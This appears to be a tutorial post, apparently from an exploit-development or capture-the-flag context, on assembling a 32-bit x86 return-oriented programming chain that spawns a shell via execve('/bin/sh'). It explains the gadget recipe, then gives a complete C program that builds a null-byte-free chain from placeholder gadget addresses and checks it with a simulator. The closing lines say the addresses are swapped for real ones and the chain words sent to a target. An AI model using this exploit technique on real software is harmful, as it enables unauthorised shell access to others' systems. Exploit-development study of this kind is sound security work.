- Write the shellcode (or pseudo-shellcode) you want to run before you start building the ROP chain. It is the reference for which registers and which memory the chain has to set up, and it matters most when the goal is something other than a plain execve ;)

This is a quick trick to build a ropchain :)
First, find gadgets for the operations you need:

a. `pop` gadgets for each of `ebx`, `ecx` and `edx` (to set them up as the syscall arguments)
b. `xor` and `inc` gadgets for `eax` (to set up the syscall number without putting a null byte in the chain)
c. A syscall gadget, i.e. `int 0x80` (obvious...)
d. This is the interesting part: find any pair of registers r1, r2 that satisfies all of the following gadget needs:
   - `mov dword ptr [r1], r2`
   - `pop` gadgets for both registers
   - an `xor r2, r2` gadget
Now you can start building your ropchain. Here is how each of those gadgets is used.

- Arbitrary writes (e.g. writing a string into `.data` so you have a pointer to it) use the register pair. For every 4 bytes of the string, the stack carries this cycle:

  ```
  pop r1
  <write location>
  pop r2
  <4 bytes of the string>
  mov dword ptr [r1], r2
  ```

  The write location is popped into r1, the next 4 bytes of the string are popped into r2, and then r2 is stored at the address held in r1, so the string lands at the write location 4 bytes at a time. The `xor r2, r2` gadget is there for the null terminator at the end of the string (use it in place of `pop r2` in the cycle, so the terminator is written without any 0x00 byte appearing in the payload) and for zeroing out a location you want to use later :)
- To set up the argument registers, put the value on the stack and `pop` it. Most common is popping the address of a zero-filled location in `.data`: the register then holds a pointer to NULL rather than NULL itself, which is good enough for arguments like argv and envp and keeps null bytes out of the payload. An `xor` gadget would zero the register directly, but those are less common for registers other than `eax`.
- The `eax` gadgets (`xor eax, eax` and then `inc eax` once per unit of the syscall number) and the `int 0x80` gadget are, obviously, the syscall itself :)
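The whole recipe carried through, as an added example that is my code and not part of the original post: a small C program that assembles the chain for execve("/bin/sh", argv, envp) from hypothetical gadget addresses (every 0x0804xxxx value below is an assumed placeholder; real ones come from a gadget finder run on the target binary), checks that the payload contains no null bytes, and then runs the chain through a tiny interpreter of just these gadgets' semantics to confirm that the string lands in `.data` with its terminator, that `ebx`, `ecx`, `edx` are set up, and that `eax` is 11 when `int 0x80` is reached. The `.data` layout (string at the base, a zeroed dword at +16) is likewise my choice for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical gadget addresses, assumed for this example only (real ones come from a
 * gadget finder on the target binary). Picked so that no word contains a 0x00 byte. */
#define POP_EBX   0x08049011u  /* pop ebx ; ret */
#define POP_ECX   0x08049012u  /* pop ecx ; ret */
#define POP_EDX   0x08049013u  /* pop edx ; ret */
#define XOR_EAX   0x08049014u  /* xor eax, eax ; ret */
#define INC_EAX   0x08049015u  /* inc eax ; ret */
#define INT80     0x08049016u  /* int 0x80 */
#define POP_R1    0x08049017u  /* pop esi ; ret   (r1 of the write pair) */
#define POP_R2    0x08049018u  /* pop edi ; ret   (r2 of the write pair) */
#define MOV_R1_R2 0x08049019u  /* mov dword ptr [esi], edi ; ret */
#define XOR_R2    0x0804901au  /* xor edi, edi ; ret */
#define DATA      0x0804a010u  /* assumed writable .data address */
#define DATA_SIZE 64
#define SYS_EXECVE_I386 11     /* execve syscall number on 32-bit Linux */

typedef struct { uint32_t w[128]; int n; } rop_chain;
static void push(rop_chain *c, uint32_t v) { c->w[c->n++] = v; }

/* pop r1 <dst> ; xor r2 ; mov [r1], r2 : store a zero dword at dst without a 0x00000000 word on the stack. */
static void rop_write_zero(rop_chain *c, uint32_t dst) {
    push(c, POP_R1); push(c, dst);
    push(c, XOR_R2);
    push(c, MOV_R1_R2);
}

/* Write s to dst four bytes per cycle, then NUL-terminate it with the xor gadget.
 * A partial last chunk is padded with 'A'; the terminator dword overwrites the padding. */
static void rop_write_string(rop_chain *c, uint32_t dst, const char *s) {
    size_t len = strlen(s);
    for (size_t off = 0; off < len; off += 4) {
        uint32_t chunk = 0;
        for (int i = 0; i < 4; i++) {
            unsigned char b = (off + i < len) ? (unsigned char)s[off + i] : 'A';
            chunk |= (uint32_t)b << (8 * i);          /* little-endian word */
        }
        push(c, POP_R1); push(c, dst + (uint32_t)off);
        push(c, POP_R2); push(c, chunk);
        push(c, MOV_R1_R2);
    }
    rop_write_zero(c, dst + (uint32_t)len);
}

/* execve("/bin/sh", argv, envp) with argv and envp both pointing at a zeroed dword. */
static void build_execve_chain(rop_chain *c) {
    uint32_t str = DATA, nul = DATA + 16;
    c->n = 0;
    rop_write_string(c, str, "/bin/sh");
    rop_write_zero(c, nul);
    push(c, POP_EBX); push(c, str);                 /* ebx = filename */
    push(c, POP_ECX); push(c, nul);                 /* ecx = argv -> { NULL } */
    push(c, POP_EDX); push(c, nul);                 /* edx = envp -> { NULL } */
    push(c, XOR_EAX);
    for (int i = 0; i < SYS_EXECVE_I386; i++) push(c, INC_EAX);
    push(c, INT80);
}

/* For strcpy-style overflows: any 0x00 byte truncates the payload. Returns 1 if one is present. */
static int chain_has_null_byte(const rop_chain *c) {
    for (int i = 0; i < c->n; i++)
        for (int k = 0; k < 4; k++)
            if (((c->w[i] >> (8 * k)) & 0xffu) == 0) return 1;
    return 0;
}

/* Tiny interpreter of just these gadgets' semantics so the chain can be checked offline.
 * Returns eax at the moment int 0x80 is reached, or -1 on a bad write / unknown gadget. */
typedef struct { uint32_t eax, ebx, ecx, edx, esi, edi; uint8_t data[DATA_SIZE]; } cpu;
static int run_chain(const rop_chain *c, cpu *m) {
    memset(m, 0, sizeof *m);
    memset(m->data, 0xcc, DATA_SIZE);               /* .data starts out non-zero on purpose */
    for (int pc = 0; pc < c->n; pc++) {
        switch (c->w[pc]) {
        case POP_EBX: m->ebx = c->w[++pc]; break;
        case POP_ECX: m->ecx = c->w[++pc]; break;
        case POP_EDX: m->edx = c->w[++pc]; break;
        case POP_R1:  m->esi = c->w[++pc]; break;
        case POP_R2:  m->edi = c->w[++pc]; break;
        case XOR_EAX: m->eax = 0; break;
        case INC_EAX: m->eax++; break;
        case XOR_R2:  m->edi = 0; break;
        case MOV_R1_R2:
            if (m->esi < DATA || m->esi + 4 > DATA + DATA_SIZE) return -1;
            for (int k = 0; k < 4; k++) m->data[m->esi - DATA + k] = (uint8_t)(m->edi >> (8 * k));
            break;
        case INT80:   return (int)m->eax;
        default:      return -1;                    /* chain misaligned or unknown gadget */
        }
    }
    return -1;                                      /* ran off the end without a syscall */
}

int main(void) {
    rop_chain c; cpu m;
    build_execve_chain(&c);
    int sc = run_chain(&c, &m);
    printf("%d words, null bytes: %s, syscall %d, ebx -> \"%s\"\n", c.n,
           chain_has_null_byte(&c) ? "yes" : "no", sc, (const char *)m.data + (m.ebx - DATA));
    return 0;
}
```

On a real target you replace the addresses with the ones from your gadget finder and drop the interpreter; the chain words are what you send. Two details worth keeping: the NUL terminator and the argv/envp slot are written with the `xor r2, r2` cycle, which is the only reason the payload has no 0x00 bytes, and a string whose length is not a multiple of 4 is padded with a filler byte that the terminator dword overwrites, so the write never has to put a partially-zero word on the stack.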